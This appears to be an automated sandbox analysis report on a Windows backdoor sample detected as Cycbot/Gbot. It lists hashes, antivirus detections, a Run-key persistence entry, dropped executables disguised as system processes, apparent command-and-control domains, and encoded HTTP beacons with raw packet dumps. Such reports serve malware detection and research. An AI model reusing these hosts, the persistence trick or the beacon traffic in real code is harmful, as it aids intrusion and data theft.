Analysis Date2014-06-15 01:13:35
MD5f1b83a09ae84f0184c26112fe26cb8aa
SHA140718ff7138746103916174538d2ca5f8e75ab9f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2ef4033663fdd255a9c0ecce25b201f8 sha1: a4ac20cc168ea2712dc47e0134885f8516a739c1 size: 118272
Section.rdata md5: e7b62c794e7bcfbad5a4d04e729d1313 sha1: 3b42c62a7827d9281e24fcdba599d3750c01a5a3 size: 2048
Section.data md5: 9cd070318e7d8bdf0885cc9e54184434 sha1: 8b4261e1858ed22b450787b51cd8e1b50bc1bd6f size: 43008
Section.rsr md5: 01f5c619872bea8f2df4038189918af3 sha1: 9d5edd66cba43ab3fa98c78f2f261ce4e70c1832 size: 512
Timestamp2005-10-03 07:25:37
VersionPrivateBuild: 1282
PEhash661ca7854dd655fec014dde5100a65445b5de02f
IMPhashec7d0554173f8557bd6213ed41258442
AV360 SafeGen:Trojan.Heur.KS.1
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Trojan.Pakes.gen
AVCAT (quickheal)Trojan.Pakes.gen
AVClamAVTrojan.Gbot-267
AVClamAVTrojan.Gbot-267
AVDr. WebTrojan.DownLoad2.19958
AVDr. WebTrojan.DownLoad2.19958
AVEmsisoftGen:Trojan.Heur.KS.1
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.JTN
AVEset (nod32)Win32/Kryptik.JVV
AVFortinetW32/FakeAV.PACK!tr
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVGrisoft (avg)Cryptic.BZJ
AVGrisoft (avg)Cryptic.BZJ
AVIkarusBackdoor.Win32.Cycbot
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyBackdoor.Win32.Gbot.qr
AVKasperskyBackdoor.Win32.Gbot.qr
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BH
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.1271FE69
AVRisingTrojan.Win32.Generic.1271FE69
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Trojan.Pakes

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigspiderwomen.com
Winsock DNSsmallspiderwomen.com
Winsock DNS127.0.0.1
Winsock DNSzoneij.com
Winsock DNSwww.internetsecure.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSwww.internetsecure.com
Type: A
198.203.191.132
DNSzonetf.com
Type: A
208.73.211.161
DNSzonetf.com
Type: A
208.73.211.250
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.176
DNSzonetf.com
Type: A
208.73.211.167
DNSsmallspiderwomen.com
Type: A
DNSzoneij.com
Type: A
DNSbigspiderwomen.com
Type: A
HTTP GEThttp://www.internetsecure.com/images/ismerch.gif?tq=gP4aKydZanDVihm9xc54kWUL%2BS86AhSw5iJggFetgUDHzzcYymtesVTZ1MznAGxuwri6sXDnydrCtM%2BrJwk9Gc5xLnGA%2B1xIR4wxe2DQ3MjM3z1%2FdCEfb0udpseNf26IDQdOgpHwYoTt6wqcXi3KSkaj3hhWOR00v7PZX42P85jveMEJfajGU1mMcQ4ixPHV8Cwaus30MI8ZKOqQcyydJt4gBBL7w3bzTsmZLL0pvcEyn%2BG33wLVYX5nN7Dn0SYWbBbdWgU0O9lDck%2FHXeV4q4RppGGvlmnF9J2v4w%2FeR0FUSJ9IkD6Mmapt8q%2Bbq%2BuJhNfXYFcvfIOsx0oCIoha1En8vvSysfWquV%2BdgmVuhBmVguo8pUyp%2B%2B1eqep%2BSTIwNn7I1cRl%2Bo3VH%2BlAvPVDqR5bU%2FtFFhrjlN%2BiBu5afEo1PsHUDiyuhEd6VYFQsRmLfOvxskzWsdh9gA2BNTxzKfHFXzZnwrjviy2%2BeGohM8K1hDaP0s6aNqhC%2FXRR54JYXC7R%2BdACnnLl78bFh11rTuS64NVYuA
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1032 ➝ 198.203.191.132:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.161:80
Flows TCP192.168.1.1:1040 ➝ 208.73.211.161:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 69736d65   GET /images/isme
0x00000010 (00016)   7263682e 6769663f 74713d67 5034614b   rch.gif?tq=gP4aK
0x00000020 (00032)   79645a61 6e445669 686d3978 6335346b   ydZanDVihm9xc54k
0x00000030 (00048)   57554c25 32425338 36416853 7735694a   WUL%2BS86AhSw5iJ
0x00000040 (00064)   67674665 74675544 487a7a63 59796d74   ggFetgUDHzzcYymt
0x00000050 (00080)   65735654 5a314d7a 6e414778 75777269   esVTZ1MznAGxuwri
0x00000060 (00096)   36735844 6e796472 43744d25 3242724a   6sXDnydrCtM%2BrJ
0x00000070 (00112)   776b3947 6335784c 6e474125 32423178   wk9Gc5xLnGA%2B1x
0x00000080 (00128)   49523477 78653244 51334d6a 4d337a31   IR4wxe2DQ3MjM3z1
0x00000090 (00144)   25324664 43456662 30756470 73654e66   %2FdCEfb0udpseNf
0x000000a0 (00160)   32364944 51644f67 70487759 6f547436   26IDQdOgpHwYoTt6
0x000000b0 (00176)   77716358 69334b53 6b616a33 6868574f   wqcXi3KSkaj3hhWO
0x000000c0 (00192)   52303076 37505a58 34325038 356a7665   R00v7PZX42P85jve
0x000000d0 (00208)   4d454a66 616a4755 316d4d63 51346978   MEJfajGU1mMcQ4ix
0x000000e0 (00224)   50485638 43776175 7333304d 49385a4b   PHV8Cwaus30MI8ZK
0x000000f0 (00240)   4f715163 7979644a 74346742 424c3777   OqQcyydJt4gBBL7w
0x00000100 (00256)   33627a54 736d5a4c 4c307076 6345796e   3bzTsmZLL0pvcEyn
0x00000110 (00272)   25324247 3333774c 56595835 6e4e3744   %2BG33wLVYX5nN7D
0x00000120 (00288)   6e305359 57624262 64576755 304f396c   n0SYWbBbdWgU0O9l
0x00000130 (00304)   44636b25 32464858 65563471 34527070   Dck%2FHXeV4q4Rpp
0x00000140 (00320)   4747766c 6d6e4639 4a327634 77253246   GGvlmnF9J2v4w%2F
0x00000150 (00336)   65523046 55534a39 496b4436 4d6d6170   eR0FUSJ9IkD6Mmap
0x00000160 (00352)   74387125 32426271 25324275 4a684e66   t8q%2Bbq%2BuJhNf
0x00000170 (00368)   58594663 7666494f 7378306f 43496f68   XYFcvfIOsx0oCIoh
0x00000180 (00384)   6131456e 38767653 79736657 71755625   a1En8vvSysfWquV%
0x00000190 (00400)   32426467 6d567568 426d5667 756f3870   2BdgmVuhBmVguo8p
0x000001a0 (00416)   55797025 32422532 42316571 65702532   Uyp%2B%2B1eqep%2
0x000001b0 (00432)   42535449 774e6e37 49316352 6c253242   BSTIwNn7I1cRl%2B
0x000001c0 (00448)   6f335648 2532426c 41765056 44715235   o3VH%2BlAvPVDqR5
0x000001d0 (00464)   62552532 46744646 68726a6c 4e253242   bU%2FtFFhrjlN%2B
0x000001e0 (00480)   69427535 6166456f 31507348 55446979   iBu5afEo1PsHUDiy
0x000001f0 (00496)   75684564 36565946 5173526d 4c664f76   uhEd6VYFQsRmLfOv
0x00000200 (00512)   78736b7a 57736468 39674132 424e5478   xskzWsdh9gA2BNTx
0x00000210 (00528)   7a4b6648 46587a5a 6e77726a 76697932   zKfHFXzZnwrjviy2
0x00000220 (00544)   25324265 476f684d 384b3168 44615030   %2BeGohM8K1hDaP0
0x00000230 (00560)   7336614e 71684325 32465852 5235344a   s6aNqhC%2FXRR54J
0x00000240 (00576)   59584337 52253242 6441436e 6e4c6c37   YXC7R%2BdACnnLl7
0x00000250 (00592)   38624668 31317254 75533634 4e565975   8bFh11rTuS64NVYu
0x00000260 (00608)   41204854 54502f31 2e300d0a 436f6e6e   A HTTP/1.0..Conn
0x00000270 (00624)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000280 (00640)   6f73743a 20777777 2e696e74 65726e65   ost: www.interne
0x00000290 (00656)   74736563 7572652e 636f6d0d 0a416363   tsecure.com..Acc
0x000002a0 (00672)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000002b0 (00688)   67656e74 3a206961 6d782f33 2e31310d   gent: iamx/3.11.
0x000002c0 (00704)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a39 36643734 20202067 67466574   ...96d74   ggFet
0x00000160 (00352)   67554448 7a7a6359 796d740a            gUDHzzcYymt.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a73650d   on: close....se.
0x00000150 (00336)   0a0d0a39 36643734 20202067 67466574   ...96d74   ggFet
0x00000160 (00352)   67554448 7a7a6359 796d740a            gUDHzzcYymt.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a34 20202067 67466574   ose....4   ggFet
0x00000160 (00352)   67554448 7a7a6359 796d740a            gUDHzzcYymt.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a20206d 70617469   close....  mpati
0x00000160 (00352)   626c653b 204d5349 4520360a            ble; MSIE 6.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a                       ose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a6b4436 4d6d6170   close....kD6Mmap
0x00000160 (00352)   74387125 32426271 25324275 4a684e66   t8q%2Bbq%2BuJhNf
0x00000170 (00368)   58594663 7666494f 7378306f 43496f68   XYFcvfIOsx0oCIoh
0x00000180 (00384)   6131456e 38767653 79736657 71755625   a1En8vvSysfWquV%
0x00000190 (00400)   32426467 6d567568 426d5667 756f3870   2BdgmVuhBmVguo8p
0x000001a0 (00416)   55797025 32422532 42316571 65702532   Uyp%2B%2B1eqep%2
0x000001b0 (00432)   42535449 774e6e37 49316352 6c253242   BSTIwNn7I1cRl%2B
0x000001c0 (00448)   6f335648 2532426c 41765056 44715235   o3VH%2BlAvPVDqR5
0x000001d0 (00464)   62552532 46744646 68726a6c 4e253242   bU%2FtFFhrjlN%2B
0x000001e0 (00480)   69427535 6166456f 31507348 55446979   iBu5afEo1PsHUDiy
0x000001f0 (00496)   75684564 36565946 5173526d 4c664f76   uhEd6VYFQsRmLfOv
0x00000200 (00512)   78736b7a 57736468 39674132 424e5478   xskzWsdh9gA2BNTx
0x00000210 (00528)   7a4b6648 46587a5a 6e77726a 76697932   zKfHFXzZnwrjviy2
0x00000220 (00544)   25324265 476f684d 384b3168 44615030   %2BeGohM8K1hDaP0
0x00000230 (00560)   7336614e 71684325 32465852 5235344a   s6aNqhC%2FXRR54J
0x00000240 (00576)   59584337 52253242 6441436e 6e4c6c37   YXC7R%2BdACnnLl7
